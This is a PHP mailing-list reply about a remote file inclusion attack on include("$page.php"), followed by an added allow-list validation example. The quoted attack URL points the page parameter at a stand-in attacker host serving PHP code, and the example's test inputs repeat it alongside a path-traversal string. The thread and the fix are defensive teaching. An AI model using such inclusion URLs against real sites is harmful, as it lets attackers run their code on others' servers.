Seak, Teng-Fong wrote:
> But after I've spent some time reading the log files, I've finally
> found out how the hackers managed to achieve worm infiltration.
> Actually, they're using a URL like this:
> http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
> And the some-worm-file.txt file contains some PHP code, while my
> index.php contains this instruction:
> include("$page.php");
> This is enough to make infiltration possible! IMO, this instruction
> is supposed to be used like this, isn't it? So this is obviously a PHP
> security loophole and I don't see how the "poorly written scripts" can
> help anything unless a total rewrite! And there's no "poor server
> security" that I can see.

You mean to say that you're not validating what you're getting from the
user? Frankly you deserve everything you get. This is *not* a "security
loophole", it *is* a poorly written script.

> I've installed PHP5 and the problem seems fixed. However, PHP
> writes out where the problem occurs! Indeed, the hacker could read a
> line like this:
> Warning: include() [function.include]: URL file-access is disabled in
> the server configuration in
> C:\Inetpub\wwwroot\index.php on line X
> I don't want them (the hackers) to be able to read this either.
> That gives too much information about my server's file system. How can
> I stop that?

Read the manual, specifically the error_reporting part. You can turn the
display of these messages off.

> By the way, I know there're still a lot of servers out there still
> using PHP4. Is this vulnerability a known bug? At least, I wasn't aware
> of that before!

It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+)
introduces the ability to turn off the ability to prevent this issue,
but it's still badly written code. Stop blaming the tool, start blaming
the mirror image and start learning how to code defensively.
-Stut
--
PHP General Mailing List (http://www.php.net/)
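An added example, not part of the original thread and not code from either poster: one way to validate the `page` parameter against an allow-list before calling `include`, with error display turned off so warnings go to the server log instead of the response. The page names, the `pages/` directory and the `resolve_page()` helper are assumptions made for illustration.

```php
<?php
// Added illustration; page names, pages/ directory and resolve_page() are hypothetical.

// Keep warnings (which reveal file system paths) out of the HTTP response
// and send them to the server-side log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// Allow-list: the only request values accepted, each mapped to a fixed local file.
// The user-supplied string is never used to build the path itself.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested, string $baseDir): ?string
{
    // Non-strings (e.g. ?page[]=x) and any value not in the allow-list are rejected.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . PAGES[$requested];
}

$baseDir = __DIR__ . DIRECTORY_SEPARATOR . 'pages';

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs, including the URL form quoted in the thread.
    $samples = ['home', 'http://hacker-domain.com/some-worm-file.txt?',
                '../../boot.ini', 'HOME', ['home']];
    foreach ($samples as $s) {
        printf("%-50s => %s\n", json_encode($s), resolve_page($s, $baseDir) ?? 'REJECTED');
    }
    exit(0);
}

// Web request path: unknown or missing pages get a plain 404, nothing is included.
$file = resolve_page($_GET['page'] ?? 'home', $baseDir);
if ($file === null || !is_file($file)) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

Run from the command line, only `home` resolves to a path; the remote URL, the traversal string, the wrong-case name and the array value are all rejected.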